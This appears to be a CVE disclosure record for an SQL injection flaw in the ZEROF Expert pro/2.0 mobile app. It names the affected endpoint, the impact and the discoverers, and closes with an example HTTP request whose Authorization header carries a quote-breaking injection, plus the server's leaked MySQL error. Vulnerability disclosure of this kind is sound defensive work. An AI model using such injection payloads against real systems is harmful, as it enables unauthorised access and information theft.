CVE-2021-30176
Description
The ZEROF Expert pro/2.0 application for mobile devices allows SQL Injection.
Additional Information
Parameters received by the web application must be sanitized and filtered to prevent the execution of control constructs
Vulnerability Type
SQL Injection
Vendor of Product
Zerof
Affected Product Code Base
ZEROF Expert pro/2.0 (mobile app)
Affected Component
affected /v2/devices/add, Authorization header
Attack Type
Remote
Impact Code execution
true
Impact Information Disclosure
true
Discoverer
- Anna Sidorova
- AWILLIX LLC
Attack Vectors
Example:
POST /v2/devices/add HTTP/1.1
Host: zerof
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Date: Thu, 07 Apr 2021 13:40:57 +0300
Content-Length: 241
User-Agent: ZEROF Expert pro/2.0 (com.zerof.expertpro; build:2; iOS 14.4.0) Alamofire/4.8.2
Accept-Language: ru-RU;q=1.0
Authorization: ZWS admin':e4NQCMRQELfsoddJwJPz/YoB3ak=
Accept-Encoding: gzip, deflate
device=?unrecognized?&geo=55.70402368871489%2C37.615802664058954&os=iOS%2014.4&token=f9Q0hE5JRpE%3AAPA91bFP19KGIIwJyLrbTuLwtP_jUvkUqqFM_k4W8czxm3ajT5Rh0jD2OHO_NmRIeY1C9zjzzNS_ch8VlNy2Bnqj5FcIdrWIFEevprpMGf3k96uFHuUsaa3aF8FS-RGwIsY8AXcUYcOP
HTTP/1.1 500 Internal Server Error
Connection: close
Content-Type: application/json; charset=utf-8
Content-Length: 176
Date: Wed, 07 Apr 2021 10:35:59 GMT
Server: ZEROF Web Server
<html> #42000You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''admin'')' at line 1 </html>